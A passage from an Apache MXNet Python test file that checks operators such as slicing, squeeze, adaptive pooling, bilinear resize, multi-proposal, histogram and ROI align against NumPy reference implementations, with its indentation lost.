(slice(None, None, -1), slice(None, None, -1), slice(None, None, -1)),
(slice(10, 0, -2), slice(5, 2, -1), slice(7, None, 3), slice(None, 12, 4))]
for index in index_list:
test_slice_forward_backward(arr, index)
# check numeric gradient
in_data = np.arange(36).reshape(2, 2, 3, 3)
data = mx.sym.Variable('data')
slice_sym = mx.sym.slice(data, begin=[0, None], end=[1, None], step=[2, -1])
check_numeric_gradient(slice_sym, [in_data])
def test_slice_partial_infer():
def check_slice_partial_infer(data, begin, end, step, expected_out_shape):
out = mx.sym.slice(data, begin=begin, end=end, step=step)
assert (out.infer_shape_partial()[1][0] == expected_out_shape), out.infer_shape_partial()[1]
def check_slice_axis_partial_infer(data, axis, begin, end, expected_out_shape):
out = mx.sym.slice_axis(data, axis=axis, begin=begin, end=end)
assert (out.infer_shape_partial()[1][0] == expected_out_shape), out.infer_shape_partial()[1]
var1 = mx.sym.var(name="data", shape=(0, 20))
check_slice_partial_infer(var1, (None, None), (None, 10), [], (0, 10))
check_slice_partial_infer(var1, (None, None), (None, 10), (None, 2), (0, 5))
check_slice_partial_infer(var1, (None, 3), (None, 10), [], (0, 7))
check_slice_partial_infer(var1, (None, 3), (5, 10), [], (0, 7))
check_slice_partial_infer(var1, (2, 3), (None, 10), [], (0, 7))
check_slice_partial_infer(var1, (2, 3), (None, 10), (None, 1), (0, 7))
check_slice_partial_infer(var1, (2, 3), (None, 10), (3, 3), (0, 3))
var1 = mx.sym.var(name="data", shape=(10, 0))
check_slice_axis_partial_infer(var1, 0, 0, 5, (5, 0))
check_slice_axis_partial_infer(var1, 1, 0, 5, (10, 0))
with mx.np_shape():
var1 = mx.sym.var(name="data", shape=(-1, 20))
check_slice_partial_infer(var1, (None, None), (None, 10), [], (-1, 10))
check_slice_partial_infer(var1, (None, None), (None, 10), (None, 2), (-1, 5))
check_slice_partial_infer(var1, (None, 3), (None, 10), [], (-1, 7))
check_slice_partial_infer(var1, (None, 3), (5, 10), [], (-1, 7))
check_slice_partial_infer(var1, (2, 3), (None, 10), [], (-1, 7))
check_slice_partial_infer(var1, (2, 3), (None, 10), (None, 1), (-1, 7))
check_slice_partial_infer(var1, (2, 3), (None, 10), (3, 3), (-1, 3))
var1 = mx.sym.var(name='data', shape=(10, -1))
check_slice_axis_partial_infer(var1, 0, 0, 5, (5, -1))
check_slice_axis_partial_infer(var1, 1, 0, 5, (10, -1))
def test_float16_min_max():
"""Test for issue: https://github.com/apache/incubator-mxnet/issues/9007"""
a = mx.nd.array([np.finfo('float16').min, np.finfo('float16').max], dtype='float16')
assert a.dtype == np.float16
assert np.finfo('float16').min == mx.nd.min(a).asscalar()
assert np.finfo('float16').max == mx.nd.max(a).asscalar()
@mx.use_np_shape
def test_zero_size_min_max():
def min():
a = mx.nd.zeros(shape=(5, 0))
a.min()
def max():
a = mx.nd.zeros(shape=(5, 0))
a.max()
pytest.raises(MXNetError, min)
pytest.raises(MXNetError, max)
def test_squeeze_op():
def check_squeeze_op(shape, axis=None):
data = mx.nd.random.uniform(low=-10.0, high=10.0, shape=shape)
if axis is None:
out = mx.nd.squeeze(data).asnumpy()
out_expected = np.squeeze(data.asnumpy())
else:
out = mx.nd.squeeze(data, axis=axis).asnumpy()
out_expected = np.squeeze(data.asnumpy(), axis=axis)
if out.shape == (1,): # as an exception (1, 1, 1) will be squeezed to (1,)
out_expected = np.squeeze(data.asnumpy(), axis=tuple([i for i in range(1, len(shape))]))
assert same(out, out_expected)
# check forward
check_squeeze_op((1, 5, 1, 3, 1), 0)
check_squeeze_op((1, 5, 1, 3, 1), 2)
check_squeeze_op((1, 5, 1, 3, 1), 4)
check_squeeze_op((1, 5, 1, 3, 1), (0, 4))
check_squeeze_op((1, 5, 1, 3, 1), (0, 2, 4))
check_squeeze_op((1, 5, 1, 3, 1))
check_squeeze_op((1, 1, 1, 1))
# check gradient
data = mx.symbol.Variable('data')
shape = (1, 2, 1, 3, 1)
data_tmp = np.ones(shape)
test = mx.sym.squeeze(data)
check_numeric_gradient(test, [data_tmp])
test = mx.sym.squeeze(data, axis=2)
check_numeric_gradient(test, [data_tmp])
test = mx.sym.squeeze(data, axis=(2, 4))
check_numeric_gradient(test, [data_tmp])
@pytest.mark.serial
def test_adaptive_avg_pool_op():
def py_adaptive_avg_pool(x, height, width):
# 2D per frame adaptive avg pool
def adaptive_avg_pool_frame(x, y):
isizeH, isizeW = x.shape
osizeH, osizeW = y.shape
for oh in range(osizeH):
istartH = int(np.floor(1.0 * (oh * isizeH) / osizeH))
iendH = int(np.ceil(1.0 * (oh + 1) * isizeH / osizeH))
kH = iendH - istartH
for ow in range(osizeW):
istartW = int(np.floor(1.0 * (ow * isizeW) / osizeW))
iendW = int(np.ceil(1.0 * (ow + 1) * isizeW / osizeW))
kW = iendW - istartW
xsum = 0
for ih in range(kH):
for iw in range(kW):
xsum += x[istartH+ih][istartW+iw]
y[oh][ow] = xsum / kH / kW
B,C,_,_ = x.shape
y = np.empty([B,C,height, width], dtype=x.dtype)
for b in range(B):
for c in range(C):
adaptive_avg_pool_frame(x[b][c], y[b][c])
return y
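    # The reference above computes each output cell as the plain average of the input
    # window [floor(oh*H/OH), ceil((oh+1)*H/OH)) x [floor(ow*W/OW), ceil((ow+1)*W/OW)),
    # mirroring the adaptive pooling definition, one (batch, channel) frame at a time.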
def check_adaptive_avg_pool_op(shape, output_height, output_width=None):
x = mx.nd.random.uniform(shape=shape)
if output_width is None:
y = mx.nd.contrib.AdaptiveAvgPooling2D(x, output_size=output_height)
npy = py_adaptive_avg_pool(x.asnumpy(), output_height, output_height)
else:
y = mx.nd.contrib.AdaptiveAvgPooling2D(x, output_size=(output_height, output_width))
npy = py_adaptive_avg_pool(x.asnumpy(), output_height, output_width)
assert_almost_equal(y.asnumpy(), npy)
shape = (2, 2, 10, 10)
for i in range(1, 11):
check_adaptive_avg_pool_op(shape, i)
for j in range(1, 11):
check_adaptive_avg_pool_op(shape, i, j)
def test_bilinear_resize_op():
def py_bilinear_resize(x, outputHeight, outputWidth):
batch, channel, inputHeight, inputWidth = x.shape
if outputHeight == inputHeight and outputWidth == inputWidth:
return x
y = np.empty([batch, channel, outputHeight, outputWidth])
rheight = 1.0 * (inputHeight - 1) / (outputHeight - 1) if outputHeight > 1 else 0.0
rwidth = 1.0 * (inputWidth - 1) / (outputWidth - 1) if outputWidth > 1 else 0.0
for h2 in range(outputHeight):
h1r = 1.0 * h2 * rheight
h1 = int(np.floor(h1r))
h1lambda = h1r - h1
h1p = 1 if h1 < (inputHeight - 1) else 0
for w2 in range(outputWidth):
w1r = 1.0 * w2 * rwidth
w1 = int(np.floor(w1r))
w1lambda = w1r - w1
w1p = 1 if w1 < (inputWidth - 1) else 0
for b in range(batch):
for c in range(channel):
y[b][c][h2][w2] = (1-h1lambda)*((1-w1lambda)*x[b][c][h1][w1] + \
w1lambda*x[b][c][h1][w1+w1p]) + \
h1lambda*((1-w1lambda)*x[b][c][h1+h1p][w1] + \
w1lambda*x[b][c][h1+h1p][w1+w1p])
return y
def py_bilinear_resize_backward(x, incoming_grads, mode='size'):
data1 = np.zeros_like(x)
data2 = incoming_grads
batchsize = data1.shape[0]
channels = data1.shape[1]
height1 = data1.shape[2]
width1 = data1.shape[3]
height2 = data2.shape[2]
width2 = data2.shape[3]
rheight = float(height1 - 1) / (height2 - 1) if (height2 > 1) else 0
rwidth = float(width1 - 1) / (width2 - 1) if (width2 > 1) else 0
# special case: just copy
if height1 == height2 and width1 == width2:
data1 += data2
return [data1]
for h2 in range(0, height2):
for w2 in range(0, width2):
h1r = rheight * h2
h1 = int(h1r)
h1p = 1 if (h1 < height1 - 1) else 0
h1lambda = h1r - h1
h0lambda = 1 - h1lambda
#
w1r = rwidth * w2
w1 = int(w1r)
w1p = 1 if (w1 < width1 - 1) else 0
w1lambda = w1r - w1
w0lambda = 1 - w1lambda
#
for n in range(0, batchsize):
for c in range(0, channels):
d2val = data2[n][c][h2][w2]
data1[n][c][h1][w1] += h0lambda * w0lambda * d2val
data1[n][c][h1][w1 + w1p] += h0lambda * w1lambda * d2val
data1[n][c][h1 + h1p][w1] += h1lambda * w0lambda * d2val
data1[n][c][h1 + h1p][w1 + w1p] += h1lambda * w1lambda * d2val
if mode == 'like':
return data1, np.zeros_like(incoming_grads)
return [data1]
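    # The reference backward above scatters every incoming gradient element back to the
    # four neighbouring input pixels using the same bilinear weights as the forward pass
    # (h0lambda/h1lambda, w0lambda/w1lambda); in 'like' mode the second input gets zeros.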
def check_bilinear_resize_op(shape, height, width):
x = mx.nd.random.uniform(shape=shape)
y = mx.nd.contrib.BilinearResize2D(x, height=height, width=width)
assert_almost_equal(y, py_bilinear_resize(x.asnumpy(), height, width))
x_scale = width / shape[-1]
y_scale = height / shape[-2]
y = mx.nd.contrib.BilinearResize2D(x, scale_height=y_scale, scale_width=x_scale)
assert_almost_equal(y.asnumpy(), py_bilinear_resize(x.asnumpy(), height, width))
def check_bilinear_resize_align_corners_op():
img_shape = [1, 1, 3, 2]
data = [64, 32, 32, 64, 50, 100]
target_height = 6
target_width = 4
expected_data = {}
# align_corners = False
expected_data[0] = [
64.000, 56.000, 40.000, 32.000, 56.000, 52.000, 44.000, 40.000, 40.000, 44.000, 52.000, 56.000,
36.500, 45.625, 63.875, 73.000, 45.500, 56.875, 79.625, 91.000, 50.000, 62.500, 87.500, 100.000
]
# align_corners = True
expected_data[1] = [
64.000, 53.333, 42.667, 32.000, 51.200, 49.067, 46.933, 44.800, 38.400, 44.800, 51.200, 57.600,
35.600, 47.467, 59.333, 71.200, 42.800, 57.067, 71.333, 85.600, 50.000, 66.667, 83.333, 100.000
]
x = np.array(data, dtype=np.float32).reshape(img_shape)
x_nd = mx.nd.array(x)
y0 = np.array(expected_data[0]).reshape((1, 1, target_height, target_width))
y0_nd = mx.nd.contrib.BilinearResize2D(x_nd, height=target_height, width=target_width, mode='size', align_corners=False)
assert_almost_equal(y0, y0_nd.asnumpy(), atol=1e-3)
y1 = np.array(expected_data[1]).reshape((1, 1, target_height, target_width))
y1_nd = mx.nd.contrib.BilinearResize2D(x_nd, height=target_height, width=target_width, mode='size', align_corners=True)
assert_almost_equal(y1, y1_nd.asnumpy(), atol=1e-3)
def check_bilinear_resize_modes_op(shape, scale_height=None, scale_width=None, shape_1=None, mode=None):
x = mx.nd.random.uniform(shape=shape)
original_h = shape[2]
original_w = shape[3]
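        # Each mode derives the expected output height/width from the input size;
        # the operator's output shape and values are checked against this reference.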
if mode == 'odd_scale':
assert scale_height is not None and scale_width is not None
new_h = int(original_h * scale_height) if (original_h % 2) == 0 else \
int((original_h - 1) * scale_height) + 1
new_w = int(original_w * scale_width) if (original_w % 2) == 0 \
else int((original_w - 1) * scale_width) + 1
y = mx.nd.contrib.BilinearResize2D(x, scale_height=scale_height,
scale_width=scale_width,
mode='odd_scale')
elif mode == 'to_even_down':
new_h = original_h if (original_h % 2) == 0 else original_h - 1
new_w = original_w if (original_w % 2) == 0 else original_w - 1
y = mx.nd.contrib.BilinearResize2D(x, mode='to_even_down')
elif mode == 'to_even_up':
new_h = original_h if (original_h % 2) == 0 else original_h + 1
new_w = original_w if (original_w % 2) == 0 else original_w + 1
y = mx.nd.contrib.BilinearResize2D(x, mode='to_even_up')
elif mode == 'to_odd_down':
new_h = original_h if (original_h % 2) == 1 else original_h - 1
new_w = original_w if (original_w % 2) == 1 else original_w - 1
y = mx.nd.contrib.BilinearResize2D(x, mode='to_odd_down')
elif mode == 'to_odd_up':
new_h = original_h if (original_h % 2) == 1 else original_h + 1
new_w = original_w if (original_w % 2) == 1 else original_w + 1
y = mx.nd.contrib.BilinearResize2D(x, mode='to_odd_up')
elif mode == 'like':
x_1 = mx.nd.random.uniform(shape=shape_1)
new_h = x_1.shape[2]
new_w = x_1.shape[3]
y = mx.nd.contrib.BilinearResize2D(x, x_1, mode='like')
new_shape_desired = np.array([shape[0], shape[1], new_h, new_w], dtype='int')
new_shape_got = np.array(y.shape, dtype='int')
data_sym = mx.sym.var('data')
data_np = x.asnumpy()
expected = py_bilinear_resize(data_np, new_h, new_w)
out_grads = np.ones([shape[0], shape[1], new_h, new_w])
expected_backward = py_bilinear_resize_backward(data_np, out_grads, mode)
assert_array_equal(new_shape_desired, new_shape_got, "Desired and got shapes are not equal. {} vs {}".format(
str(new_shape_desired.tolist()), str(new_shape_got.tolist())))
assert_almost_equal(y.asnumpy(), expected, 1e-3, 0)
if mode != 'like':
resize_sym = mx.sym.contrib.BilinearResize2D(data_sym, None, scale_height=scale_height, scale_width=scale_width, mode=mode)
check_symbolic_forward(resize_sym, [data_np], [expected], rtol=1e-3, atol=1e-5)
check_symbolic_backward(resize_sym, [data_np], [out_grads], expected_backward, rtol=1e-3, atol=1e-5)
check_numeric_gradient(resize_sym, [data_np], rtol=1e-2, atol=1e-4)
else:
data_sym_like = mx.sym.var('data_like')
resize_sym = mx.sym.contrib.BilinearResize2D(data_sym, data_sym_like, mode=mode)
            data_np_like = x_1.asnumpy()
            check_symbolic_forward(resize_sym, [data_np, data_np_like], [expected], rtol=1e-3, atol=1e-5)
            check_symbolic_backward(resize_sym, [data_np, data_np_like], [out_grads], expected_backward, rtol=1e-3, atol=1e-5)
            check_numeric_gradient(resize_sym, [data_np, data_np_like], rtol=1e-2, atol=1e-4)
shape = (2, 2, 10, 10)
check_bilinear_resize_op(shape, 5, 5)
check_bilinear_resize_op(shape, 10, 10)
check_bilinear_resize_op(shape, 15, 15)
check_bilinear_resize_op(shape, 3, 7)
check_bilinear_resize_op(shape, 13, 17)
shape = (2, 2, 20, 20)
check_bilinear_resize_modes_op(shape, scale_height=0.5, scale_width=0.5, mode='odd_scale')
check_bilinear_resize_modes_op(shape, scale_height=5, scale_width=10, mode='odd_scale')
check_bilinear_resize_modes_op(shape, scale_height=0.1, scale_width=0.2, mode='odd_scale')
check_bilinear_resize_modes_op(shape, mode='to_even_down')
check_bilinear_resize_modes_op(shape, mode='to_even_up')
check_bilinear_resize_modes_op(shape, mode='to_odd_down')
check_bilinear_resize_modes_op(shape, mode='to_odd_up')
shape = (2, 2, 21, 21)
check_bilinear_resize_modes_op(shape, scale_height=0.5, scale_width=0.5, mode='odd_scale')
check_bilinear_resize_modes_op(shape, scale_height=5, scale_width=10, mode='odd_scale')
check_bilinear_resize_modes_op(shape, scale_height=0.1, scale_width=0.2, mode='odd_scale')
check_bilinear_resize_modes_op(shape, mode='to_even_down')
check_bilinear_resize_modes_op(shape, mode='to_even_up')
check_bilinear_resize_modes_op(shape, mode='to_odd_down')
check_bilinear_resize_modes_op(shape, mode='to_odd_up')
shape_0 = (2, 2, 21, 21)
shape_1 = (2, 2, 10, 10)
check_bilinear_resize_modes_op(shape_0, shape_1=shape_1, mode='like')
check_bilinear_resize_modes_op(shape_1, shape_1=shape_0, mode='like')
check_bilinear_resize_align_corners_op()
def test_multi_proposal_op():
    # parameters
feature_stride = 16
scales = (8, 16, 32)
ratios = (0.5, 1, 2)
rpn_pre_nms_top_n = 12000
rpn_post_nms_top_n = 2000
threshold = 0.7
rpn_min_size = 16
batch_size = 20
feat_len = (1000 + 15) // 16
H, W = feat_len, feat_len
num_anchors = len(scales) * len(ratios)
count_anchors = H * W * num_anchors
'''
cls_prob: (batch_size, 2 * num_anchors, H, W)
bbox_pred: (batch_size, 4 * num_anchors, H, W)
im_info: (batch_size, 3)
'''
cls_prob = mx.nd.empty((batch_size, 2 * num_anchors, H, W), dtype = np.float32)
bbox_pred = mx.nd.empty((batch_size, 4 * num_anchors, H, W), dtype = np.float32)
im_info = mx.nd.empty((batch_size, 3), dtype = np.float32)
cls_prob = mx.nd.array(np.random.random(cls_prob.shape))
bbox_pred = mx.nd.array(np.random.random(bbox_pred.shape))
for i in range(batch_size):
im_size = np.random.randint(100, feat_len * feature_stride, size = (2,))
im_scale = np.random.randint(70, 100) / 100.0
im_info[i, :] = [im_size[0], im_size[1], im_scale]
def get_sub(arr, i):
new_shape = list(arr.shape)
new_shape[0] = 1
res = arr[i].reshape(new_shape)
return res
def check_forward(rpn_pre_nms_top_n, rpn_post_nms_top_n):
single_proposal = []
single_score = []
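        # Run the single-image Proposal op per batch element and compare the stacked
        # results against MultiProposal applied to the whole batch at once.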
for i in range(batch_size):
rois, score = mx.nd.contrib.Proposal(
cls_prob = get_sub(cls_prob, i),
bbox_pred = get_sub(bbox_pred, i),
im_info = get_sub(im_info, i),
feature_stride = feature_stride,
scales = scales,
ratios = ratios,
rpn_pre_nms_top_n = rpn_pre_nms_top_n,
rpn_post_nms_top_n = rpn_post_nms_top_n,
threshold = threshold,
rpn_min_size = rpn_min_size, output_score = True)
single_proposal.append(rois)
single_score.append(score)
multi_proposal, multi_score = mx.nd.contrib.MultiProposal(
cls_prob = cls_prob,
bbox_pred = bbox_pred,
im_info = im_info,
feature_stride = feature_stride,
scales = scales,
ratios = ratios,
rpn_pre_nms_top_n = rpn_pre_nms_top_n,
rpn_post_nms_top_n = rpn_post_nms_top_n,
threshold = threshold,
rpn_min_size = rpn_min_size, output_score = True)
single_proposal = mx.nd.stack(*single_proposal).reshape(multi_proposal.shape)
single_score = mx.nd.stack(*single_score).reshape(multi_score.shape)
single_proposal_np = single_proposal.asnumpy()
multi_proposal_np = multi_proposal.asnumpy()
single_score_np = single_score.asnumpy()
multi_score_np = multi_score.asnumpy()
# check rois x1,y1,x2,y2
assert np.allclose(single_proposal_np[:, 1:], multi_proposal_np[:, 1:])
# check rois batch_idx
for i in range(batch_size):
start = i * rpn_post_nms_top_n
end = start + rpn_post_nms_top_n
assert (multi_proposal_np[start:end, 0] == i).all()
# check score
assert np.allclose(single_score_np, multi_score_np)
def check_backward(rpn_pre_nms_top_n, rpn_post_nms_top_n):
im_info_sym = mx.sym.Variable('im_info')
cls_prob_sym = mx.sym.Variable('cls_prob')
bbox_pred_sym = mx.sym.Variable('bbox_pred')
sym = mx.sym.contrib.MultiProposal(
cls_prob = cls_prob_sym,
bbox_pred = bbox_pred_sym,
im_info = im_info_sym,
feature_stride = feature_stride,
scales = scales,
ratios = ratios,
rpn_pre_nms_top_n = rpn_pre_nms_top_n,
rpn_post_nms_top_n = rpn_post_nms_top_n,
threshold = threshold,
rpn_min_size = rpn_min_size, output_score = False)
location = [cls_prob.asnumpy(), bbox_pred.asnumpy(), im_info.asnumpy()]
expected = [np.zeros_like(e) for e in location]
out_grads = [np.ones((rpn_post_nms_top_n, 5))]
check_symbolic_backward(sym, location, out_grads, expected)
check_forward(rpn_pre_nms_top_n, rpn_post_nms_top_n)
check_forward(rpn_pre_nms_top_n, 1500)
check_forward(1000, 500)
check_backward(rpn_pre_nms_top_n, rpn_post_nms_top_n)
def test_quadratic_function():
def f(x, a, b, c):
return a * x**2 + b * x + c
a = np.random.random_sample()
b = np.random.random_sample()
c = np.random.random_sample()
data = mx.symbol.Variable('data')
quad_sym = mx.sym.contrib.quadratic(data=data, a=a, b=b, c=c)
for dtype in [np.float16, np.float32, np.float64]:
tol = 1e-2 if dtype is np.float16 else 1e-5
for ndim in range(1, 6):
shape = rand_shape_nd(ndim, 5)
data_np = np.random.randn(*shape).astype(dtype)
expected = f(data_np, a, b, c)
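            # analytic gradient of the quadratic: d/dx (a*x^2 + b*x + c) = 2*a*x + b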
backward_expected = 2 * a * data_np + b
# check imperative forward
output = mx.nd.contrib.quadratic(mx.nd.array(data_np), a=a, b=b, c=c)
assert_almost_equal(output, expected, rtol=tol, atol=tol)
# check forward
check_symbolic_forward(quad_sym, [data_np], [expected], rtol=tol, atol=tol)
# check backward
check_symbolic_backward(quad_sym, [data_np], [np.ones(expected.shape)],
[backward_expected], rtol=tol, atol=tol)
# check backward using finite difference
check_numeric_gradient(quad_sym, [data_np], atol=0.001)
def allclose_function(contexts):
def getRandom(base, percent = 1.):
return base * (1 + percent * (2 * np.random.random_sample() - 1.) / 100)
title = 'exp'
for ctx in contexts:
title += ' cpu' if ctx == mx.cpu() else ' gpu'
title += ' nElem shape'
num_ctx = len(contexts)
result = [False, False]
for dtype in [np.float16, np.float32, np.float64]:
rtol = getRandom(1e-2 if dtype is np.float16 else 1e-5)
atol = getRandom(1e-4 if dtype is np.float16 else 1e-7)
print('\nnumpy.{}: atol = {} rtol = {}'.format(dtype.__name__, atol, rtol))
print(title)
for ndim in range(1, 10):
shape = rand_shape_nd(ndim, 8)
a_np = np.random.randn(*shape).astype(dtype)
b_np = (a_np + np.random.randn(*shape).astype(dtype) / 10000000).astype(dtype)
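            # np.allclose marks elements as close when |a - b| <= atol + rtol * |b|;
            # the operator output on each context is compared against this reference.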
expected = np.allclose(a_np, b_np, rtol, atol)
for n, ctx in enumerate(contexts):
a_ctx = mx.nd.array(a_np, dtype = dtype, ctx=ctx)
b_ctx = mx.nd.array(b_np, dtype = dtype, ctx=ctx)
output = mx.nd.contrib.allclose(a_ctx, b_ctx, rtol=rtol, atol=atol)
result[n] = output.asnumpy() == 1
if expected != result[n]:
                    # Report the elements the array comparison considers "not close",
                    # together with the corresponding elements of the CPU/GPU/Python
                    # reference vectors that are considered "close".
v_ctx = 'CPU' if ctx == mx.cpu() else 'GPU'
if expected:
v_cmp = 'Python'
a_b = a_ctx.asnumpy()
b_b = b_ctx.asnumpy()
a_g = np.asarray(a_np)
b_g = np.asarray(b_np)
else:
v_cmp = v_ctx
v_ctx = 'Python'
a_b = np.asarray(a_np)
b_b = np.asarray(b_np)
a_g = a_ctx.asnumpy()
b_g = b_ctx.asnumpy()
print('\n *** Violations found on %s, but not on %s side ***' % (v_ctx, v_cmp))
frmt = " a[{0:d}]: b[{0:d}]:" \
" abs(a[{0:d}]-b[{0:d}]) - atol + rtol*abs(b[{0:d}]):"
# Define the indices of all violations and corresponding values of coordinates
bad_indexes = np.abs(a_b - b_b) >= atol + rtol * abs(b_b)
a_values = [a_b[bad_indexes], a_g[bad_indexes]]
b_values = [b_b[bad_indexes], b_g[bad_indexes]]
                        idx = np.transpose(np.asarray(np.where(bad_indexes)))
                        idx_flat = np.asarray(np.where(bad_indexes.flatten())).flatten()
for i in range(len(a_values[0])):
flat_idx = idx_flat[i]
print('{}: index = {} flat_index = {}'.format('%4d'%i, idx[i], flat_idx))
print(frmt.format(flat_idx))
for j in range(2):
diff = np.abs(a_values[j][i]-b_values[j][i]) - atol + rtol*abs(b_values[j][i])
print('{}: {} {} {}'.format('%6s'%v_ctx, a_values[j][i], b_values[j][i], diff))
if num_ctx == 1:
print(' {0:d} {1:d} {2:10d} {3:}'.format(expected, result[0], np.prod(shape), shape))
else:
print(' {0:d} {1:d} {2:d} {3:10d} {4:}'.format(expected, result[0], result[1], np.prod(shape), shape))
if expected != result[0] or num_ctx > 1 and expected != result[1]:
assert False
@pytest.mark.serial
def test_allclose_function():
allclose_function([default_context()])
def test_histogram():
def f(x, bins=10, range=None):
return np.histogram(x, bins, range=range)
for ndim in range(1, 6):
shape = rand_shape_nd(ndim)
x = rand_ndarray(shape, stype='default', dtype=np.float64)
mx_bins = mx.nd.array([-1.0, 0.5, 2.0, 4.5, 50.0], dtype=np.float64)
np_bins = mx_bins.asnumpy()
bin_cnt = random.randint(2, 10)
bin_range = (-2.5, 2.5)
mx_histo1, mx_bins1 = mx.nd.histogram(x, bins=bin_cnt, range=bin_range)
np_histo1, np_bins1 = f(x.asnumpy(), bins=bin_cnt, range=bin_range)
assert_almost_equal(mx_bins1, np_bins1)
assert_almost_equal(mx_histo1, np_histo1, rtol=1e-3, atol=1e-5)
mx_histo2, mx_bins2 = mx.nd.histogram(x, bins=mx_bins)
np_histo2, np_bins2 = f(x.asnumpy(), bins=np_bins)
assert_almost_equal(mx_histo2, np_histo2, rtol=1e-3, atol=1e-5)
assert_almost_equal(mx_bins2, np_bins2, rtol=1e-3, atol=1e-5)
data = mx.sym.Variable("data")
bins = mx.sym.Variable("bins")
histo1 = mx.sym.histogram(a=data, bins=bin_cnt, range=bin_range)
histo2 = mx.sym.histogram(a=data, bins=bins)
executor1 = histo1._bind(ctx=default_context(), args={"data" : x})
executor1.forward(is_train=False)
assert_almost_equal(np_histo1, executor1.outputs[0].asnumpy(), 0, 0, ("EXPECTED_histo1", "FORWARD_histo1"), equal_nan=False)
executor2 = histo2._bind(ctx=default_context(), args={"data" : x, "bins" : mx_bins})
executor2.forward(is_train=False)
assert_almost_equal(np_histo2, executor2.outputs[0].asnumpy(), 0, 0, ("EXPECTED_histo2", "FORWARD_histo2"), equal_nan=False)
@pytest.mark.skip(reason="test fails intermittently. temporarily disabled till it gets fixed. tracked at https://github.com/apache/incubator-mxnet/issues/13915")
def test_activation():
shapes = [(9,), (9, 10), (9, 10, 10), (1, 9, 10, 10)]
dtype_l = [np.float64, np.float32, np.float16]
rtol_l = [1e-7, 1e-6, 1e-2]
atol_l = [1e-7, 1e-6, 1e-2]
rtol_fd = 1e-5
atol_fd = 1e-6
num_eps = 1e-6
unary_ops = {
'relu': [lambda x: mx.sym.Activation(x, act_type='relu'),
lambda x: np.maximum(x, 0.),
lambda x: 1. * (x > 0.),
-5.0, 5.0],
'sigmoid': [lambda x: mx.sym.Activation(x, act_type='sigmoid'),
lambda x: 1. / (np.exp(-x) + 1.),
lambda x: 1. / (np.exp(-x) + 1.) / (np.exp(x) + 1.),
-3.0, 3.0],
'tanh': [lambda x: mx.sym.Activation(x, act_type='tanh'),
lambda x: np.tanh(x),
lambda x: 1. - np.tanh(x) ** 2,
-4.0, 4.0],
'softrelu': [lambda x: mx.sym.Activation(x, act_type='softrelu'),
lambda x: np.log(1. + np.exp(x)),
lambda x: 1. - 1 / (1 + np.exp(x)),
-3.0, 3.0],
'softsign': [lambda x: mx.sym.Activation(x, act_type='softsign'),
lambda x: x / (1. + np.abs(x)),
lambda x: 1. / np.square(1. + np.abs(x)),
-3.0, 3.0],
}
# Loop over operators
for name, op in unary_ops.items():
# Loop over shapes
for shape in shapes:
            # Loop over dtypes
for ind in range(len(dtype_l)):
dtype = dtype_l[ind]
rtol = rtol_l[ind]
atol = atol_l[ind]
compare_forw_backw_unary_op(
name, op[0], op[1], op[2], shape, op[3], op[4], rtol, atol,
dtype)
# Finite difference testing
finite_diff_unary_op(
name, op[0], shape, op[3], op[4], rtol_fd, atol_fd, num_eps)
@pytest.mark.serial
def test_ravel():
# be aware that check_symbolic_forward will use float type internally
# for the arrays and that limits the representable flat index range.
# Taking dim==4 and a range of [0,..,100] for the data can already
# cause precision issues and break this test.
for dim in [1, 2, 3, 4]:
data = np.random.randint(50, size=(dim, 500))
shape = tuple(np.add(np.amax(data, axis=1), [1]))
a = mx.sym.Variable('a')
ravel_npy = np.ravel_multi_index(data, shape)
b = mx.sym.ravel_multi_index(a, shape=shape)
check_symbolic_forward(b, location={'a': data}, expected=[ravel_npy])
c = mx.sym.unravel_index(a, shape=shape)
check_symbolic_forward(c, location={'a': ravel_npy}, expected=[data])
# Test with leading dimension set to -1.
shape2 = shape
shape2 = (-1,)+shape[1:]
b = mx.sym.ravel_multi_index(a, shape=shape2)
check_symbolic_forward(b, location={'a': data}, expected=[ravel_npy])
c = mx.sym.unravel_index(a, shape=shape2)
check_symbolic_forward(c, location={'a': ravel_npy}, expected=[data])
def test_unravel_index():
unravel_shape = (2, 10)
unravel_size = np.prod(unravel_shape)
for shape in [(10,), (2, 10), (3, 4, 5)]:
a = np.random.randint(0, unravel_size, size=shape)
b = np.stack(np.unravel_index(a, shape=unravel_shape), 0)
a_mx = mx.nd.array(a)
b_mx = mx.nd.unravel_index(a_mx, shape=unravel_shape)
assert_array_equal(b, b_mx.asnumpy())
def test_context_num_gpus():
try:
        # Note: the test runs on both GPU and CPU hosts, so we cannot assert
        # a specific number here.
assert mx.context.num_gpus() >= 0
except mx.MXNetError as e:
        # Note: on a CPU-only host, CUDA sometimes cannot determine the number
        # of GPUs.
if str(e).find("CUDA") == -1:
raise e
@pytest.mark.serial
def test_op_roi_align():
T = np.float32
def assert_same_dtype(dtype_a, dtype_b):
'''
        Assert that the two data types are the same
Parameters
----------
dtype_a, dtype_b: type
Input data types to compare
'''
assert dtype_a == dtype_b,\
TypeError('Unmatched data types: %s vs %s' % (dtype_a, dtype_b))
def bilinear_interpolate(bottom, height, width, y, x):
if y < -1.0 or y > height or x < -1.0 or x > width:
return T(0.0), []
x = T(max(0.0, x))
y = T(max(0.0, y))
x_low = int(x)
y_low = int(y)
if x_low >= width - 1:
x_low = x_high = width - 1
x = T(x_low)
else:
x_high = x_low + 1
if y_low >= height - 1:
y_low = y_high = height - 1
y = T(y_low)
else:
y_high = y_low + 1
ly = y - T(y_low)
lx = x - T(x_low)
hy = T(1.0) - ly
hx = T(1.0) - lx
v1 = bottom[y_low, x_low]
v2 = bottom[y_low, x_high]
v3 = bottom[y_high, x_low]
v4 = bottom[y_high, x_high]
w1 = hy * hx
w2 = hy * lx
w3 = ly * hx
w4 = ly * lx
assert_same_dtype(w1.dtype, T)
assert_same_dtype(w2.dtype, T)
assert_same_dtype(w3.dtype, T)
assert_same_dtype(w4.dtype, T)
val = w1 * v1 + w2 * v2 + w3 * v3 + w4 * v4
assert_same_dtype(val.dtype, T)
grad = [(y_low, x_low, w1), (y_low, x_high, w2),
(y_high, x_low, w3), (y_high, x_high, w4)
]
return val, grad
def roialign_forward_backward(data, rois, pooled_size, spatial_scale, sampling_ratio,
position_sensitive, dy):
N, C, H, W = data.shape
R = rois.shape[0]
PH, PW = pooled_size
assert rois.ndim == 2,\
ValueError(
'The ndim of rois should be 2 rather than %d' % rois.ndim)
assert rois.shape[1] == 5,\
ValueError(
'The length of the axis 1 of rois should be 5 rather than %d' % rois.shape[1])
assert_same_dtype(data.dtype, T)
assert_same_dtype(rois.dtype, T)
C_out = C // PH // PW if position_sensitive else C
out = np.zeros((R, C_out, PH, PW), dtype=T)
dx = np.zeros_like(data)
drois = np.zeros_like(rois)
